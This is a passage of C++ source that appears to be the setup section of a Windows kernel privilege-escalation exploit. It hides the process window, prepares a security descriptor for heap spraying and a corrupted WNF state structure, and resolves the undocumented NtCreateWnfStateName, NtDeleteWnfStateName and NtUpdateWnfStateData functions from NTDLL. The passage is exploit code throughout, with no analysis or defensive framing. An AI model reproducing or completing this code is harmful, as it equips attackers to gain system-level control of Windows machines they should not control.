si.dwFlags |= STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE; // 隐藏窗口
OBJECT_ATTRIBUTES oa = { 0 };
unsigned long cnt = 0;
SECURITY_DESCRIPTOR sd = { 0 };
SECURITY_DESCRIPTOR sd_spraying = { 0 };
SECURITY_DESCRIPTOR* psd;
ULONG stamp = 0;
WNF_STATE_CORRUPTED* regBuffersControllerWNF = NULL;
PACL pdacl;
ACCESS_ALLOWED_ACE* newace =
reinterpret_cast<ACCESS_ALLOWED_ACE*>(VirtualAlloc(NULL, 0x10000,
MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE));
ACCESS_ALLOWED_ACE* ace;
ACCESS_ALLOWED_ACE* other_ace;
myNtCreateWnfStateName fNtCreateWnfStateName =
(myNtCreateWnfStateName)GetProcAddress(GetModuleHandleA("NTDLL.dll"),
"NtCreateWnfStateName");
myNtDeleteWnfStateName fNtDeleteWnfStateName =
(myNtDeleteWnfStateName)GetProcAddress(GetModuleHandleA("NTDLL.dll"),
"NtDeleteWnfStateName");
myNtUpdateWnfStateData fNtUpdateWnfStateData =
(myNtUpdateWnfStateData)GetProcAddress(GetModuleHandleA("NTDLL.dll"),
"NtUpdateWnfStateData");
|